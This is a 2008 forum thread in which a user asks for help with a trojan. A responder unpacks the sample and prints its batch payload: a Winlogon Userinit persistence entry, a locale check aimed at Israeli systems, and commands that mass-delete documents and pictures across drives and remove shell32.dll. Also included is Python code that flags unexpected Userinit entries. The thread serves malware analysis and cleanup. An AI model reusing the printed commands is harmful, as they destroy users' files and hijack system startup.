14.05.2008, 22:09
Hello everybody,

I have discovered by chance a few processes running from a TMP file/VBS script.

I copy and paste the VBS script. I do not know what this Trojan is doing, but when I deleted the files and rebooted, my keyboard and mouse didn't work! I have tried several antivirus, anti-rootkit and anti-spyware tools, which didn't work.
moderated::: file attached as VBS.txt

14.05.2008, 22:21
adis, can you send us a copy of this file?

Looks like this is a part of Worm.Win32.AutoRun...

15.05.2008, 00:13
I have put the VBS script and the explot.exe, renamed to explot-root.exe, here:


15.05.2008, 08:00
Explot-root.exe - malware.
Packed with two packers: UPX and Morphine.
Unpacked file contains .bat file which I think explains everything:

@echo off..title....reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\system32\taskfile.exe /f....reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"..reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"..find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit..find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit....del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm..del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm..del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm..del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm..del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm..del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm..del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm..del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm....del /f %systemroot%\system32\shell32.dll..del /f %systemdrive%\svi*...
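
The first command in the .bat dump above appends taskfile.exe to the Winlogon Userinit value, so that value is the place to check on a suspect machine. As an added example (not part of the original thread), this Python code splits a Userinit value and lists every entry other than the stock userinit.exe; the function names, the sample values and the default system root C:\Windows are assumptions made for the example.

```python
import ntpath
import re

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

def expand(path, env):
    """Expand %VAR% references case-insensitively using the given mapping."""
    return re.sub(r"%([^%]+)%",
                  lambda m: env.get(m.group(1).lower(), m.group(0)), path)

def unexpected_userinit_entries(value, systemroot=r"C:\Windows"):
    """Return the Userinit entries that are not the stock userinit.exe."""
    env = {"systemroot": systemroot, "windir": systemroot}
    expected = ntpath.normcase(
        ntpath.join(systemroot, "system32", "userinit.exe"))
    extras = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if not entry:
            continue  # the stock value ends with a trailing comma
        resolved = ntpath.normcase(ntpath.normpath(expand(entry, env)))
        if resolved != expected:
            extras.append(entry)
    return extras

def read_userinit():
    """Read the live value; only works on Windows (winreg is Windows-only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        return winreg.QueryValueEx(key, "Userinit")[0]

# Constructed sample values: the stock setting, and the value written by
# the reg ADD line in the dump (system root assumed to be C:\Windows).
CLEAN = r"C:\Windows\system32\userinit.exe,"
MODIFIED = (r"%systemroot%\system32\userinit.exe,"
            r"%systemroot%\system32\taskfile.exe")

if __name__ == "__main__":
    for label, value in (("clean", CLEAN), ("modified", MODIFIED)):
        print(label, unexpected_userinit_entries(value))
```

On a live Windows system, pass the result of read_userinit() to unexpected_userinit_entries(); an empty list means only the stock entry is present.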

15.05.2008, 09:34
Thanks! Any idea how to cure this?

It seems it was supposed to delete all my documents and pictures on the system. And, at the end, it was deleting itself and shell32? Do you think shell32 and tasklist are infected as well?

I have Avast Home Edition running as antivirus on my system. It did not detect anything! Trying to cure with others didn't work either!


15.05.2008, 09:50
Thanks! Any idea how to cure this?